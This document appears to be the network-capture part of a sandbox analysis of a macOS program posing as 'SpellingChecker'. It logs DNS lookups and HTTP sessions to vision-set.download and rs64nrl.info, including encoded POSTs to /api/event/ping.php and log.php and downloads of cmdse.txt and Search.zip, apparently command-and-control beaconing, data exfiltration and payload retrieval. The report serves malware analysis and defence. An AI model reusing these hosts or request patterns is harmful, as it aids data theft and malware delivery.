Oct 3, 2018 14:12:21.094913006 CEST | 49239 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.095313072 CEST | 49239 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.120892048 CEST | 80 | 49239 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.121130943 CEST | 80 | 49239 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.121359110 CEST | 49239 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.124125957 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.149065971 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.149282932 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.149861097 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.175211906 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.175479889 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.175589085 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.175760031 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.175822020 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.175872087 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.175980091 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.176088095 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.176131010 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.176142931 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.176201105 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.176275015 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.176309109 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.176417112 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.176460981 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.176531076 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.176618099 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.176630020 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.201268911 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.201314926 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.201514006 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.201586008 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.201602936 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.201623917 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.201790094 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.201827049 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.201901913 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.202009916 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.202008963 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.202150106 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.202205896 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.202229977 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.202341080 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.202406883 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.202450037 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.202517986 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.202559948 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.202667952 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.202694893 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.202779055 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.202869892 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.202888012 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.202997923 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.203037977 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.203104973 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.203191042 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.203216076 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.203289032 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.226723909 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.226769924 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.226977110 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.227087975 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.227144003 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.227168083 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.227202892 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.227310896 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.227334976 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.227475882 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.227507114 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.227582932 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.227694035 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.227727890 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.227799892 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.227896929 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.227909088 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.227966070 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.228066921 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.228179932 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.228229046 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.228297949 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.228341103 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.228398085 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.228509903 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.228535891 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.228614092 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.228622913 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.228729963 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.228800058 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.228838921 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.228893995 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:21.228971004 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:21.229055882 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:24.303474903 CEST | 49238 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:24.303718090 CEST | 49238 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:24.328821898 CEST | 80 | 49238 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:24.336076975 CEST | 80 | 49238 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:24.336282969 CEST | 49238 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:24.337944984 CEST | 49238 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:24.338150978 CEST | 49238 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:24.363127947 CEST | 80 | 49238 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:24.364283085 CEST | 80 | 49238 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:24.364473104 CEST | 49238 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:24.367214918 CEST | 49237 | 80 | 192.168.0.50 | 163.172.60.125
Oct 3, 2018 14:12:24.367216110 CEST | 49238 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:24.367216110 CEST | 49239 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:24.367217064 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:24.367218018 CEST | 49236 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:24.367221117 CEST | 49235 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:24.389642954 CEST | 80 | 49237 | 163.172.60.125 | 192.168.0.50
Oct 3, 2018 14:12:24.389909029 CEST | 49237 | 80 | 192.168.0.50 | 163.172.60.125
Oct 3, 2018 14:12:24.390078068 CEST | 80 | 49236 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:24.390259981 CEST | 49236 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:24.392165899 CEST | 80 | 49238 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:24.392318010 CEST | 80 | 49240 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:24.392337084 CEST | 49238 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:24.392494917 CEST | 80 | 49235 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:24.392519951 CEST | 49240 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:24.392657042 CEST | 49235 | 80 | 192.168.0.50 | 195.154.31.197
Oct 3, 2018 14:12:24.392959118 CEST | 80 | 49239 | 195.154.31.197 | 192.168.0.50
Oct 3, 2018 14:12:24.393166065 CEST | 49239 | 80 | 192.168.0.50 | 195.154.31.197

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 3, 2018 14:12:20.368386984 CEST | 58419 | 53 | 192.168.0.50 | 8.8.8.8
Oct 3, 2018 14:12:20.405252934 CEST | 53 | 58419 | 8.8.8.8 | 192.168.0.50
Oct 3, 2018 14:12:20.528991938 CEST | 49265 | 53 | 192.168.0.50 | 8.8.8.8
Oct 3, 2018 14:12:20.560709000 CEST | 53 | 49265 | 8.8.8.8 | 192.168.0.50

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 3, 2018 14:12:20.368386984 CEST | 192.168.0.50 | 8.8.8.8 | 0xcb7 | Standard query (0) | vision-set.download | A (IP address) | IN (0x0001)
Oct 3, 2018 14:12:20.528991938 CEST | 192.168.0.50 | 8.8.8.8 | 0x4d81 | Standard query (0) | rs64nrl.info | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 3, 2018 14:12:20.405252934 CEST | 8.8.8.8 | 192.168.0.50 | 0xcb7 | No error (0) | vision-set.download | - | 195.154.31.197 | A (IP address) | IN (0x0001)
Oct 3, 2018 14:12:20.560709000 CEST | 8.8.8.8 | 192.168.0.50 | 0x4d81 | No error (0) | rs64nrl.info | - | 163.172.60.125 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• vision-set.download
• rs64nrl.info

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port
0 | 192.168.0.50 | 49235 | 195.154.31.197 | 80

Timestamp | kBytes transferred | Direction | Data
Oct 3, 2018 14:12:20.435791969 CEST | 0 | OUT | GET /hello.txt HTTP/1.1
  Host: vision-set.download
  Accept: */*
  Accept-Language: en-us
  Connection: keep-alive
  Accept-Encoding: gzip, deflate
  User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Oct 3, 2018 14:12:20.461371899 CEST | 1 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Wed, 03 Oct 2018 12:12:20 GMT
  Content-Type: text/plain
  Content-Length: 5
  Last-Modified: Sat, 23 Jun 2018 20:45:31 GMT
  Connection: keep-alive
  ETag: "5b2eb16b-5"
  Accept-Ranges: bytes
  Data Raw: 77 6f 72 6c 64
  Data Ascii: world


Session ID | Source IP | Source Port | Destination IP | Destination Port
1 | 192.168.0.50 | 49236 | 195.154.31.197 | 80

Timestamp | kBytes transferred | Direction | Data
Oct 3, 2018 14:12:20.488446951 CEST | 1 | OUT | GET /hello.txt HTTP/1.1
  Host: vision-set.download
  Accept: */*
  Accept-Language: en-us
  Connection: keep-alive
  Accept-Encoding: gzip, deflate
  User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Oct 3, 2018 14:12:20.511811018 CEST | 1 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Wed, 03 Oct 2018 12:12:20 GMT
  Content-Type: text/plain
  Content-Length: 5
  Last-Modified: Sat, 23 Jun 2018 20:45:31 GMT
  Connection: keep-alive
  ETag: "5b2eb16b-5"
  Accept-Ranges: bytes
  Data Raw: 77 6f 72 6c 64
  Data Ascii: world


Session ID | Source IP | Source Port | Destination IP | Destination Port
2 | 192.168.0.50 | 49237 | 163.172.60.125 | 80

Timestamp | kBytes transferred | Direction | Data
Oct 3, 2018 14:12:20.585050106 CEST | 2 | OUT | GET /readautoip.php?prefix=upd: HTTP/1.1
  Host: rs64nrl.info
  Accept: */*
  Accept-Language: en-us
  Connection: keep-alive
  Accept-Encoding: gzip, deflate
  User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Oct 3, 2018 14:12:20.608927965 CEST | 3 | IN | HTTP/1.1 404 Not Found
  Server: nginx/1.9.15
  Date: Wed, 03 Oct 2018 12:12:20 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Access-Control-Allow-Origin: *
  Content-Encoding: gzip
  Data Raw: 32 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 4e ad 54 c8 cb 2f 51 48 cb 2f cd 4b 51 04 00 c6 30 55 ce 0e 00 00 00 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 22NT/QH/KQ0U0


              Session IDSource IPSource PortDestination IPDestination Port
              3192.168.0.5049238195.154.31.19780
              TimestampkBytes transferredDirectionData
              Okt 3, 2018 14:12:21.032751083 MESZ3OUTPOST /api/event/ping.php HTTP/1.1
              Host: vision-set.download
              Content-Type: text/plain
              Connection: keep-alive
              X-Sig: 9d367d4a3ad24b5a591135355f3e9c86
              Accept: */*
              Accept-Language: en-us
              Content-Length: 664
              Accept-Encoding: gzip, deflate
              User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
              Okt 3, 2018 14:12:21.033561945 MESZ4OUTData Raw: 53 7a 6f 51 45 42 4a 46 51 31 56 43 58 6c 46 64 56 52 49 51 43 68 41 53 57 46 56 65 51 6b 6b 53 48 44 6f 51 45 42 4a 41 51 6c 39 55 52 56 4e 45 59 46 78 5a 51 30 52 2b 55 56 31 56 45 68 41 4b 45 42 49 53 48 44 6f 51 45 42 4a 52 52 68 49 51 43 68
              Data Ascii: SzoQEBJFQ1VCXlFdVRIQChASWFVeQkkSHDoQEBJAQl9URVNEYFxZQ0R+UV1VEhAKEBISHDoQEBJRRhIQChASEhw6EBASQ0VSb1lUEhAKEBISHDoQEBJGXRIQChAAHDoQEBJTWVRvX0QSEAoQABw6EBASQEYSEAoQABw6EBASU1hRXl5VXBIQChASEhw6EBASU1MSEAoQEn11Ehw6EBASU1lUflVHEhAKEAAcOhAQEkBCX1RFU0R
              Timestamp:Okt 3, 2018 14:12:21.064258099 MESZ
              kBytes transferred:5
              Direction:IN
              Data:HTTP/1.1 200 OK
              Server: nginx
              Date: Wed, 03 Oct 2018 12:12:21 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: keep-alive
              Set-Cookie: PHPSESSID=fc4m3g6a5jd0bl2j4t3muq3a73; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Content-Encoding: gzip
              Data Raw: 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d ce 41 0b c2 20 18 80 e1 bf 34 21 0f 1d 3a a8 7c 86 1b 0c 9c fa 69 1d 67 4e 41 a9 4b 30 e9 d7 57 97 e8 fe bc f0 9a 3e 5a d7 d5 04 f7 f9 00 65 37 28 9b 80 fc 30 97 81 63 90 fd 1a da ed e5 25 5a df 55 84 ca a3 77 33 ac 84 2e 01 9d 11 65 b4 81 0c 49 ff 6c 4c 8e 14 74 e4 89 ba d0 8e 04 d3 c2 ff ba 8f d3 ad 6d c8 d5 c4 72 64 8c ef 26 b4 a3 0d a8 8d c8 2c 42 a3 9b ae 98 56 22 cf df 07 a8 c3 e9 0d 3e 61 e5 7d a0 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 96MA 4!:|igNAK0W>Ze7(0c%ZUw3.eIlLtmrd&,BV">a}0
              Timestamp:Okt 3, 2018 14:12:24.303474903 MESZ
              kBytes transferred:65
              Direction:OUT
              Data:POST /api/event/ping.php HTTP/1.1
              Host: vision-set.download
              Content-Type: text/plain
              Cookie: PHPSESSID=fc4m3g6a5jd0bl2j4t3muq3a73
              X-Sig: 285c03db2374dd9d8f7102356e9b09e6
              Connection: keep-alive
              Accept: */*
              Accept-Language: en-us
              Content-Length: 668
              Accept-Encoding: gzip, deflate
              User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
              Timestamp:Okt 3, 2018 14:12:24.303718090 MESZ
              kBytes transferred:65
              Direction:OUT
              Data Raw: 53 7a 6f 51 45 42 4a 46 51 31 56 43 58 6c 46 64 56 52 49 51 43 68 41 53 57 46 56 65 51 6b 6b 53 48 44 6f 51 45 42 4a 41 51 6c 39 55 52 56 4e 45 59 46 78 5a 51 30 52 2b 55 56 31 56 45 68 41 4b 45 42 49 53 48 44 6f 51 45 42 4a 52 52 68 49 51 43 68
              Data Ascii: SzoQEBJFQ1VCXlFdVRIQChASWFVeQkkSHDoQEBJAQl9URVNEYFxZQ0R+UV1VEhAKEBISHDoQEBJRRhIQChASEhw6EBASQ0VSb1lUEhAKEBISHDoQEBJGXRIQChAAHDoQEBJTWVRvX0QSEAoQABw6EBASQEYSEAoQARw6EBASU1hRXl5VXBIQChASEhw6EBASU1MSEAoQEnN4Ehw6EBASU1lUflVHEhAKEAEHHDoQEBJAQl9URVN
              Timestamp:Okt 3, 2018 14:12:24.336076975 MESZ
              kBytes transferred:66
              Direction:IN
              Data:HTTP/1.1 200 OK
              Server: nginx
              Date: Wed, 03 Oct 2018 12:12:24 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: keep-alive
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Content-Encoding: gzip
              Data Raw: 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d ce 41 0b c2 20 18 80 e1 bf 34 21 0f 1d 3a a8 7c 86 1b 0c 9c fa 69 1d 67 4e 41 a9 4b 30 e9 d7 57 97 e8 fe bc f0 9a 3e 5a d7 d5 04 f7 f9 00 65 37 28 9b 80 fc 30 97 81 63 90 fd 1a da ed e5 25 5a df 55 84 ca a3 77 33 ac 84 2e 01 9d 11 65 b4 81 0c 49 ff 6c 4c 8e 14 74 e4 89 ba d0 8e 04 d3 c2 ff ba 8f d3 ad 6d c8 d5 c4 72 64 8c ef 26 b4 a3 0d a8 8d c8 2c 42 a3 9b ae 98 56 22 cf df 07 a8 c3 e9 0d 3e 61 e5 7d a0 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 96MA 4!:|igNAK0W>Ze7(0c%ZUw3.eIlLtmrd&,BV">a}0
              Timestamp:Okt 3, 2018 14:12:24.337944984 MESZ
              kBytes transferred:66
              Direction:OUT
              Data:POST /api/event/log.php HTTP/1.1
              Host: vision-set.download
              Content-Type: text/plain
              Cookie: PHPSESSID=fc4m3g6a5jd0bl2j4t3muq3a73
              X-Sig: 3eaf976ca511e914bc519cedf60dd912
              Connection: keep-alive
              Accept: */*
              Accept-Language: en-us
              Content-Length: 136
              Accept-Encoding: gzip, deflate
              User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
              Timestamp:Okt 3, 2018 14:12:24.338150978 MESZ
              kBytes transferred:66
              Direction:OUT
              Data Raw: 53 7a 6f 51 45 42 4a 5a 56 42 49 51 43 68 41 53 63 77 41 48 66 58 77 45 59 67 42 30 5a 32 6c 38 45 68 77 36 45 42 41 53 51 45 4a 56 56 6c 6c 49 45 68 41 4b 45 42 4a 46 51 46 52 52 52 46 56 43 41 67 49 53 48 44 6f 51 45 42 4a 64 51 31 63 53 45 41
              Data Ascii: SzoQEBJZVBIQChAScwAHfXwEYgB0Z2l8Ehw6EBASQEJVVllIEhAKEBJFQFRRRFVCAgISHDoQEBJdQ1cSEAoQEmBif3Rlc2QQf3sKEFNZVAoBBxAdEEBZVAoFEB0QQEYKARI6TQ==
              Timestamp:Okt 3, 2018 14:12:24.364283085 MESZ
              kBytes transferred:67
              Direction:IN
              Data:HTTP/1.1 200 OK
              Server: nginx
              Date: Wed, 03 Oct 2018 12:12:24 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Content-Encoding: gzip
              Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 140


              Session ID:4
              Source IP:192.168.0.50
              Source Port:49239
              Destination IP:195.154.31.197
              Destination Port:80
              Timestamp:Okt 3, 2018 14:12:21.095313072 MESZ
              kBytes transferred:5
              Direction:OUT
              Data:GET /files/cmdse.txt HTTP/1.1
              Host: vision-set.download
              Accept: */*
              Cookie: PHPSESSID=fc4m3g6a5jd0bl2j4t3muq3a73
              User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
              Accept-Language: en-us
              Accept-Encoding: gzip, deflate
              Connection: keep-alive
              Timestamp:Okt 3, 2018 14:12:21.121130943 MESZ
              kBytes transferred:6
              Direction:IN
              Data:HTTP/1.1 200 OK
              Server: nginx
              Date: Wed, 03 Oct 2018 12:12:21 GMT
              Content-Type: text/plain
              Last-Modified: Tue, 25 Sep 2018 17:14:26 GMT
              Transfer-Encoding: chunked
              Connection: keep-alive
              ETag: W/"5baa6cf2-350"
              Content-Encoding: gzip
              Data Raw: 32 30 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 92 cd 8e db 30 0c 84 5f c9 2a d6 87 1c 25 9b 72 9c 20 06 44 99 94 e2 5b 63 e7 07 b0 82 2d 10 a0 36 fa f4 a5 b2 49 db 6b 6f c2 50 1c 0d 3f d1 af bb 3e 2a 35 11 97 e4 d6 76 ff bd 78 78 52 89 e0 fa 69 cc ba c8 79 73 66 9b 20 f0 e6 2c 9a b7 d6 36 b5 53 0f b8 2f 1e 6e 8b 77 96 2b 52 7c 46 6b 23 63 bb d7 4e eb ad d9 21 15 38 44 f5 e1 ab db 4e 07 76 7b 83 ab 46 f1 84 b9 18 bd bc 29 9a af ae 60 e5 ae bc 5f 52 a0 f7 fd 96 88 8e 5d 1d 16 7f 32 ad 97 ba 66 da f5 cc 25 10 4f 9c 73 69 ad 47 48 b6 47 9b 2e f1 d6 ee 61 36 03 eb 4f d8 82 69 c4 d3 f7 a1 f8 5b 9f 0f be 9a 1f 92 33 51 75 75 a3 83 e3 5e 4b 4e c9 60 51 7a b5 59 9e 35 f1 85 fc d6 53 c3 c5 47 9b ce 41 78 40 ba 01 82 a9 ab fb 72 39 99 4d ad d7 12 23 db bd 64 46 2c 0e 67 e1 33 89 3e a0 62 ef 14 57 98 52 cf d4 f5 6c cb c7 b6 e8 18 81 b5 d4 1b 2d fd 81 26 a6 f9 4b db ce 3f 06 67 da 11 66 3e 07 2e 6b e1 37 c6 66 33 ca f9 94 39 67 b6 31 d9 29 33 85 94 b6 cc bb 9a 09 ed b3 27 d9 8a 8b 43 66 fb ab 76 a3 96 79 44 c3 c1 65 16 b7 ec 69 c6 40 1d 9c 54 ce 4a 99 e9 93 a3 cc 54 63 b3 c9 3c 85 75 e6 2f 1c e7 9d 8d af 99 89 71 0a fc f1 a5 27 6e 49 ad d6 a9 d4 3c ff 15 8a f1 c5 d9 be 39 67 ae 48 c7 97 8f d4 4c 2b ff 2c 3c 21 6b 20 1e eb 10 d3 23 e7 3c 22 a0 7e 31 6c 24 5b fe eb 49 78 c1 36 e1 05 55 39 46 65 49 6a 21 f0 ca ee db 72 39 2a 46 97 ba e3 7f 71 ba 77 4c b2 2b c1 94 e8 40 e7 99 c5 63 aa df f7 64 8f ab f7 d9 d9 75 70 05 fe fc d3 fb 2f b7 c2 b0 4b e9 92 e7 79 ee 87 bc 9d f7 2e fb b1 55 43 7c ed 0d d3 ad 8f c0 75 a0 21 ef a5 ee 49 75 bf 01 55 5f 33 65 50 03 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 2060_*%r D[c-6IkoP?>*5vxxRiysf ,6S/nw+R|Fk#cN!8DNv{F)`_R]2f%OsiGHG.a6Oi[3Quu^KN`QzY5SGAx@r9M#dF,g3>bWRl-&K?gf>.k7f39g1)3'CfvyDei@TJTc<u/q'nI<9gHL+,<!k #<"~1l$[Ix6U9FeIj!r9*FqwL+@cdup/Ky.UC|u!IuU_3eP0


              Session ID:5
              Source IP:192.168.0.50
              Source Port:49240
              Destination IP:195.154.31.197
              Destination Port:80
              Timestamp:Okt 3, 2018 14:12:21.149861097 MESZ
              kBytes transferred:7
              Direction:OUT
              Data:GET /files/Search.zip HTTP/1.1
              Host: vision-set.download
              Accept: */*
              Cookie: PHPSESSID=fc4m3g6a5jd0bl2j4t3muq3a73
              User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
              Accept-Language: en-us
              Accept-Encoding: gzip, deflate
              Connection: keep-alive
              Timestamp:Okt 3, 2018 14:12:21.175479889 MESZ
              kBytes transferred:8
              Direction:IN
              Data:HTTP/1.1 200 OK
              Server: nginx
              Date: Wed, 03 Oct 2018 12:12:21 GMT
              Content-Type: application/zip
              Content-Length: 53113
              Last-Modified: Tue, 25 Sep 2018 17:08:06 GMT
              Connection: keep-alive
              ETag: "5baa6b76-cf79"
              Accept-Ranges: bytes
